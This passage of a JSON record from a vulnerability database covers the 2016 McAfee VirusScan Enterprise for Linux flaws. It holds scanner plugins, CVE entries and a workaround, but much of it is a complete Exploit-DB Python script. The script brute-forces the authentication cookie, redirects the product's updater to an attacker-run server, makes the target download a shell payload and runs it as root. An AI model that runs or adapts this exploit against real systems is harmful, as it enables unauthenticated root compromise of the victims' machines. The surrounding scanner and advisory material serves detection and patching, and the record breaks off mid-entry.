Tokens (CVE-2016-8022)\n\n - Brute Force Authentication Tokens (CVE-2016-8023)\n\n - Brute Force Authentication Tokens (CVE-2016-8024)\n\n - Authenticated SQL Injection (CVE-2016-8025)\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may execute code when chained the vulnerabilities\ntogether.\");\n\n script_tag(name:\"affected\", value:\"Version 2.0.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Endpoint Security for Linux (ENSL) 10.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10181\");\n script_xref(name:\"URL\", value:\"https://nation.state.actor/mcafee.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less_equal(version: version, test_version: \"2.0.3\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"Endpoint Security for Linux 10.2\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-12-13T18:08:39", "bulletinFamily": "exploit", "description": "McAfee Virus Scan Enterprise for Linux - Remote Code Execution. CVE-2016-8016,CVE-2016-8017,CVE-2016-8018,CVE-2016-8019,CVE-2016-8020,CVE-2016-8021,CVE-2016-...", "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "id": "EDB-ID:40911", "href": "https://www.exploit-db.com/exploits/40911/", "type": "exploitdb", "title": "McAfee Virus Scan Enterprise for Linux - Remote Code Execution", "sourceData": "'''\r\nSource: https://nation.state.actor/mcafee.html\r\n\r\nVulnerabilities\r\n\r\nCVE-2016-8016: Remote Unauthenticated File Existence Test\r\nCVE-2016-8017: Remote Unauthenticated File Read (with Constraints)\r\nCVE-2016-8018: No Cross-Site Request Forgery Tokens\r\nCVE-2016-8019: Cross Site Scripting\r\nCVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation\r\nCVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location\r\nCVE-2016-8022: Remote Use of Authentication Tokens\r\nCVE-2016-8023: Brute Force Authentication Tokens\r\nCVE-2016-8024: HTTP Response Splitting\r\nCVE-2016-8025: Authenticated SQL Injection\r\nWhen chaned together, these vulnerabilities allow a remote attacker to execute code as root.\r\n'''\r\n#!/bin/python3\r\nimport time\r\nimport requests\r\nimport os\r\nimport sys\r\nimport re\r\nimport threading\r\nimport subprocess\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\nfrom socketserver import ThreadingMixIn\r\n\r\n# Per-target configuration\r\ntarget_domain=\"https://10.0.1.130\" # https://target_ip\r\nlocal_ip = '10.0.1.128' # Attacker IP for victim to connect back to\r\nauthorized_ip=\"127.0.0.1\" # IP address cookie will be valid for\r\nupdate_server_port = 8080 # Port update server listens on\r\ndelay_seconds = 10 # How long should the server take to serve the update\r\ntarget_port = 55443 # Port to target\r\n\r\n# Put payload script in payload.sh\r\n\r\n# Initialization\r\npayload_in_place = threading.Event()\r\nrequests.packages.urllib3.disable_warnings()\r\nwith open(\"payload.sh\", \"r\") as f:\r\n payload = f.read()\r\n\r\ndef pprint(inp, flag=False):\r\n pad = \"#\"\r\n if flag:\r\n pad = \"*\"\r\n print(\"\\n\" + pad+ \" \" + inp)\r\n\r\n\r\ndef crack_cookie():\r\n pprint(\"Cracking Cookie\")\r\n\r\n # A page that requires authentication\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=productUpdate.html\"\r\n\r\n # Start at the current time + 100 in case of recent login with clock skew\r\n date_val = int(time.time()+100)\r\n cookie_fmt = authorized_ip+\"/n/0/%d-checksum// \"+authorized_ip + \" \"*20\r\n\r\n # Make requests, print after every 600\r\n while True:\r\n cookie = cookie_fmt % date_val\r\n req_cookie = {\"nailsSessionId\": cookie}\r\n r = requests.get(url, cookies=req_cookie, verify=False)\r\n r.raise_for_status()\r\n\r\n if \"Set-Cookie\" in r.headers:\r\n valid_cookie = cookie\r\n timestamp = cookie.split(\"/\")[3].split(\"-\")[0]\r\n break\r\n\r\n elif date_val % 600 == 0:\r\n print(\"Now trying %s\" % time.asctime(time.localtime(date_val)))\r\n\r\n date_val -= 1\r\n\r\n pprint(\"Cookie Cracked: \" + timestamp, True)\r\n return valid_cookie\r\n\r\n\r\ndef update_update_server(auth_cookie):\r\n pprint(\"Updating update server\")\r\n\r\n # Replace McAfeeHttp update server with attacker local_ip:update_server_port\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=\" \\\r\n \"repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F\" \\\r\n \"xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists\" \\\r\n \"%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25\" \\\r\n \"3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2\" \\\r\n \"520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na\" \\\r\n \"me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee\" \\\r\n \"Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522\"+local_ip+\"%253A\"+str(update_server_port) \\\r\n + \"%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%\" \\\r\n \"253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220\" \\\r\n \"%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe\" \\\r\n \"eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221\" \\\r\n \"%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU\" \\\r\n \"seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr\" \\\r\n \"ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%\" \\\r\n \"2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select\" \\\r\n \"+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re\" \\\r\n \"posProperty=fallback&useOfProxy=on\"\r\n\r\n r = requests.get(url, cookies=auth_cookie, verify=False)\r\n r.raise_for_status()\r\n pprint(\"Updated update server\", True)\r\n\r\ndef download_update(req_cookie):\r\n pprint(\"Requesting target download payload\")\r\n\r\n # Send request to make target download payload\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails\"\r\n\r\n updateName = \"update_%d\" % int(time.time())\r\n postdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab\" \\\r\n \"le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%\" \\\r\n \"3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D\" \\\r\n \"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh\" \\\r\n \"ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+\" \\\r\n \"_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in\" \\\r\n \"fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc\" \\\r\n \"%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2\" \\\r\n \"Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask\"\"\").format(updateName)\r\n\r\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\r\n r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)\r\n r.raise_for_status()\r\n\r\n pprint(\"Payload download requested\", 1)\r\n\r\n\r\ndef exec_catalogz(req_cookie):\r\n pprint(\"Making target execute payload\")\r\n\r\n #### Get commit_id and ODS_name\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0\" \\\r\n \".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf\" \\\r\n \"o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O\" \\\r\n \"DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi\" \\\r\n \",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu\" \\\r\n \"lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction\"\r\n\r\n r = requests.get(url, cookies=req_cookie, verify=False)\r\n r.raise_for_status()\r\n\r\n regex = re.search(\"\\|digest=(.+?)\\|\", r.text)\r\n if not regex:\r\n print(\"\\nERROR: Could not get commit_id when generating evil scan\\n\")\r\n return False\r\n\r\n commit_id = regex.groups(1)[0]\r\n\r\n # Send request to start evil scan\r\n payload_path = \"%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z\"\r\n binary_path = \"%2Fbin%2Fsh\" # Use \"%2fbin%2Fstatic-sh\" for versions 1.x\r\n\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails\"\r\n\r\n ODS_name = \"ODS_1\" # This may need to be increased if the name already exists\r\n scan_name = \"scan_%s\" % str(int(time.time()))\r\n\r\n postdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=\" \\\r\n \"multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof\" \\\r\n \"ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child\" \\\r\n \"InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd\" \\\r\n \".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3\" \\\r\n \"Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi\" \\\r\n \"eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI\" \\\r\n \"nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na\" \\\r\n \"ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+\" \\\r\n \"nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar\" \\\r\n \"antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1\" \\\r\n \"}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3\" \\\r\n \"00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s\" \\\r\n \"canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild\" \\\r\n \"%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na\" \\\r\n \"ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{\" \\\r\n \"1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}\" \\\r\n \".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e\" \\\r\n \"xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act\" \\\r\n \"ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}\" \\\r\n \".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti\" \\\r\n \"on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+\" \\\r\n \"taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl\" \\\r\n \"e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D\" \\\r\n \"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+\" \\\r\n \"_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro\" \\\r\n \"gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs\" \\\r\n \"et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult\" \\\r\n \"i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9\" \\\r\n \"=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11\" \\\r\n \"=pageNo&echo%3A12=&info%3A12=selectedTask\").format(commit_id, ODS_name, scan_name,payload_path, binary_path)\r\n\r\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\r\n r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)\r\n r.raise_for_status()\r\n\r\n pprint(\"Payload executed\", 1)\r\n\r\ndef start_update_server():\r\n\r\n class RequestHandler(BaseHTTPRequestHandler):\r\n def do_HEAD(s):\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/html\")\r\n s.end_headers()\r\n\r\n def do_GET(s):\r\n if s.path == \"/catalog.z\":\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/html\")\r\n s.end_headers()\r\n s.wfile.write(bytes(payload, \"utf-8\"))\r\n\r\n pprint(\"Payload placed\", 1)\r\n\r\n payload_in_place.set()\r\n\r\n # Die after sending payload so we send an incomplete response\r\n raise KillServer\r\n\r\n else: # Assume all other requests are for SiteStat - Always increasing version\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/xml\")\r\n s.end_headers()\r\n s.wfile.write(bytes((\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\"\"\" \\\r\n \"\"\"<SiteStatus Status=\"Enabled\" CatalogVersion=\"2%d\">\"\"\" \\\r\n \"\"\" </SiteStatus>\"\"\") % int(time.time()), \"utf-8\"))\r\n\r\n # Throwing KillServer will shutdown the server ungracefully\r\n class KillServer(Exception):\r\n def __str__(self):\r\n return \"Kill Server (not an error)\"\r\n\r\n # ThreadingMixIn plus support for KillServer exceptions\r\n class AbortableThreadingMixIn(ThreadingMixIn):\r\n def process_request_thread(self, request, client_address):\r\n try:\r\n self.finish_request(request, client_address)\r\n self.shutdown_request(request)\r\n except KillServer:\r\n pprint(\"Killing update server dirtily\")\r\n self.shutdown_request(request)\r\n self.shutdown() # Only if we want to shutdown\r\n except:\r\n self.handle_error(request, client_address)\r\n self.shutdown_request(request)\r\n\r\n\r\n class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):\r\n pass\r\n\r\n pprint(\"Launching update server\")\r\n\r\n srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)\r\n threading.Thread(target=srv.serve_forever).start()\r\n\r\n pprint(\"Update server started\", 1)\r\n return srv\r\n\r\n\r\n####################################################################################\r\n####################################################################################\r\n\r\npprint(\"Attacking %s\" % target_domain, 1)\r\n\r\n# Crack the auth cookie\r\ncookie = crack_cookie()\r\nauth_cookie = {\"nailsSessionId\": cookie}\r\n\r\n# Start our update server locally\r\nsrv = start_update_server()\r\n\r\n# Force target to use our update server\r\nupdate_update_server(auth_cookie)\r\n\r\n# Make target download an update from us\r\ndownload_update(auth_cookie)\r\n\r\n# Block until the target downloads our payload,\r\npayload_in_place.wait()\r\n\r\n# Shutdown our update server\r\nsrv.shutdown()\r\n\r\n# Execute /bin/sh -(?) catalog.z\r\nexec_catalogz(auth_cookie)", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40911/"}], "nessus": [{"lastseen": "2019-11-17T18:54:16", "bulletinFamily": "scanner", "description": "The remote host has a version of McAfee VirusScan Enterprise for Linux\n(VSEL) installed that is prior or equal to 2.0.3. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n web interface due to improper error reporting. An\n authenticated, remote attacker can exploit this, by\n manipulating the ", "modified": "2019-11-02T00:00:00", "id": "MCAFEE_VSEL_SB10181.NASL", "href": "https://www.tenable.com/plugins/nessus/95812", "published": "2016-12-14T00:00:00", "title": "McAfee VirusScan Enterprise for Linux <= 2.0.3 Multiple vulnerabilities (SB10181)", "type": "nessus", "sourceData": "#TRUSTED 7fa1e66ff358b6d8b86cacbe4b2c2437d7cbb4bf031024a4bda74b06877986e1cb98f80d3c86c2537bf6e283abc17a2be76805aa430945058044479762c9f554dd59a1dcb29536c25623b7af3d3b83c830353e3f1e167e1b4b912a064f086f6b78fa32d13cecb5adc30cdfeb49ea3da353dc1e843d9d7e6bb3842c8de4d4d489e9056f8f7aa6cc03b1b558ce616399466f0678075d180b8e7fe78bc4bd7123a9efcc8d65af99a7aa1a135521298518b13c5b8ce44aafda28427001a37fd1fb1853752e8005feeaf518f0e82ddd8ff70a5c57a5a32ead531e7931440d7b51eafce530f7d4c325432c6daf2a05081b8023e22886586a51aa72fe6447e857294f254ffd49b2d012620c3bba7d5ce1bb711b1f869a7c3a5904b017b9dd0d927ce092259e0d1f59398bdb5aa719de81a365dd454d9fb8f84d1938f91878736dad09476bfa169b58d7361fb3014047522b39728613efaa6165fc1dc7c695f2054ae676961a08578b45fed102542f959d81a346518de39f7ab237970ca1ea7ea2cd0974e665ae1f34d49d152aea6597fed319e0b9905ee80346d04bececd732aed7b67e543965c33b1d36a1d5eefd3c8f6864db912440e0f2fbb28f78ea2b2eeaa304cd2d0cc953514b9a08a608d73f15ae186c2b7588cc3541ce32e5b3d762c33b63db5d8128491433bda989b1fb0542fca8535a42b9be0fe06543f562aaf0ecbf8b0b\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95812);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-8016\",\n \"CVE-2016-8017\",\n \"CVE-2016-8018\",\n \"CVE-2016-8019\",\n \"CVE-2016-8020\",\n \"CVE-2016-8021\",\n \"CVE-2016-8022\",\n \"CVE-2016-8023\",\n \"CVE-2016-8024\",\n \"CVE-2016-8025\"\n );\n script_bugtraq_id(94823);\n script_xref(name:\"MCAFEE-SB\", value:\"SB10181\");\n script_xref(name:\"CERT\", value:\"245327\");\n script_xref(name:\"EDB-ID\", value:\"40911\");\n\n script_name(english:\"McAfee VirusScan Enterprise for Linux <= 2.0.3 Multiple vulnerabilities (SB10181)\");\n script_summary(english:\"Checks VSEL version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee VirusScan Enterprise for Linux\n(VSEL) installed that is prior or equal to 2.0.3. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n web interface due to improper error reporting. An\n authenticated, remote attacker can exploit this, by\n manipulating the 'tplt' parameter, to disclose filenames\n on the system. (CVE-2016-8016)\n\n - An information disclosure vulnerability exists in the\n parser due to improper handling of template files. An\n authenticated, remote attacker can exploit this, via\n specially crafted text elements, to disclose the\n contents of arbitrary files subject to the privileges of\n the 'nails' account. (CVE-2016-8017)\n\n - Multiple cross-site request forgery (XSRF)\n vulnerabilities exist in the web interface due to a\n failure to require multiple steps, explicit\n confirmation, or a unique token when performing certain\n sensitive actions. An unauthenticated, remote attacker\n can exploit these vulnerabilities, by convincing a user\n to follow a specially crafted link, to execute arbitrary\n script code or commands in a user's browser session.\n (CVE-2016-8018)\n\n - Multiple cross-site scripting (XSS) vulnerabilities\n exist due to improper validation of user-supplied input\n to the 'info:7' and 'info:5' parameters when the 'tplt'\n parameter is set in NailsConfig.html or\n MonitorHost.html. An unauthenticated, remote attacker\n can exploit these vulnerabilities, via a specially\n crafted request, to execute arbitrary script code in a\n user's browser session. (CVE-2016-8019)\n\n - A remote code execution vulnerability exists due to\n improper validation of user-supplied input to the\n 'nailsd.profile.ODS_9.scannerPath' variable in the last\n page of the system scan form. An authenticated, remote\n attacker can exploit this, via a specially crafted HTTP\n request, to execute arbitrary code as the root user.\n (CVE-2016-8020)\n\n - A remote code execution vulnerability exists in the web\n interface when downloading update files from a specified\n update server due to a race condition. An authenticated,\n remote attacker can exploit this to place and execute a\n downloaded file before integrity checks are completed.\n (CVE-2016-8021)\n\n - A security bypass vulnerability exists in the web\n interface due to improper handling of authentication\n cookies. The authentication cookie stores the IP address \n of the client and is checked to ensure it matches the\n IP address of the client sending it; however, an \n unauthenticated, remote attacker can cause the cookie to\n be incorrectly parsed by adding a number of spaces to\n the IP address stored within the cookie, resulting in a\n bypass of the security mechanism. (CVE-2016-8022)\n\n - A security bypass vulnerability exists in the web\n interface due to improper handling of the nailsSessionId\n authentication cookie. An unauthenticated, remote\n attacker can exploit this, by brute-force guessing the\n server start authentication token within the cookie, to\n bypass authentication mechanisms. (CVE-2016-8023)\n\n - An HTTP response splitting vulnerability exists due to\n improper sanitization of carriage return and line feed\n (CRLF) character sequences passed to the 'info:0'\n parameter before being included in HTTP responses. An\n authenticated, remote attacker can exploit this to\n inject additional headers in responses and disclose\n sensitive information. (CVE-2016-8024)\n\n - A SQL injection (SQLi) vulnerability exists in the web\n interface due to improper sanitization of user-supplied\n input to the 'mon:0' parameter. An authenticated, remote\n attacker can exploit this to inject or manipulate SQL\n queries in the back-end database, resulting in the\n manipulation or disclosure of arbitrary data.\n (CVE-2016-8025)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10181\");\n script_set_attribute(attribute:\"see_also\", value:\"https://nation.state.actor/mcafee.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Endpoint Security for Linux (ENSL) version 10.2.0 or later.\nAlternatively, as a workaround, open the following line in a text editor:\n'/var/opt/NAI/LinuxShield/etc/nailsd.cfg' and change 'nailsd.disableCltWEbUI: false' \nto the value of true and restart the nails service.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8024\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:virusscan_enterprise\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_vsel_detect.nbin\");\n script_require_keys(\"installed_sw/McAfee VirusScan Enterprise for Linux\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"hostlevel_funcs.inc\");\n\nif ( islocalhost() )\n{\n port = 0;\n if ( ! defined_func(\"pread\") ) exit(1, \"'pread()' is not defined.\");\n info_t = INFO_LOCAL;\n}\nelse\n{\n port = kb_ssh_transport();\n if (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\n ret = ssh_open_connection();\n if (!ret) audit(AUDIT_FN_FAIL, \"ssh_open_connection()\");\n\n info_t = INFO_SSH;\n}\n\napp_name = \"McAfee VirusScan Enterprise for Linux\";\nget_install_count(app_name:app_name, exit_if_zero:TRUE);\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nversion = install['version'];\nvuln = FALSE;\n\nif (ver_compare(ver:version, fix:\"2.0.3\", strict:FALSE) <= 0 || version =~ \"^2\\.0\\.3\") \n{\n cmd = 'grep nailsd.disableCltWebUI /var/opt/NAI/LinuxShield/etc/nailsd.cfg | tr -d \"\\n\"';\n buf = info_send_cmd(cmd:cmd);\n # match = is temporary workaround in place?\n match = pregmatch(pattern:'nailsd.disableCltWebUI: true', string:buf);\n if (!isnull(match)) audit(AUDIT_HOST_NOT, \"affected because 'nailsd.disableCltWebUI' is set to true\");\n # set to false & vulnerable\n notSet = pregmatch(pattern:'nailsd.disableCltWebUI: false', string:buf);\n # no config setting & vuln\n dne = pregmatch(pattern:'nailsd.disableCltWebUI:', string:buf);\n # if false or if the config does not exist and we are v2.0.3 then flag as vuln\n if (!isnull(notSet) || isnull(dne)) vuln = TRUE;\n}\n\n\nif (vuln)\n{\n port = 0;\n report ='\\nInstalled version : ' + version +\n '\\nSolution : Upgrade to McAfee Endpoint Security for Linux (ENSL) 10.2.0 or later.\\n';\n security_report_v4(severity:SECURITY_WARNING, extra:report, port:port, xss:TRUE, sqli:TRUE, xsrf:TRUE);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Cross-site request forgery (CSRF) vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows authenticated remote attackers to execute unauthorized commands via a crafted user input.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8018", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8018", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8018", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Special element injection vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows authenticated remote attackers to read files on the webserver via a crafted user input.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8017", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8017", "type": "cve", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote authenticated users to obtain product information via a crafted HTTP request parameter.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8025", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8025", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8025", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Information exposure in Intel Security VirusScan Enterprise Linux 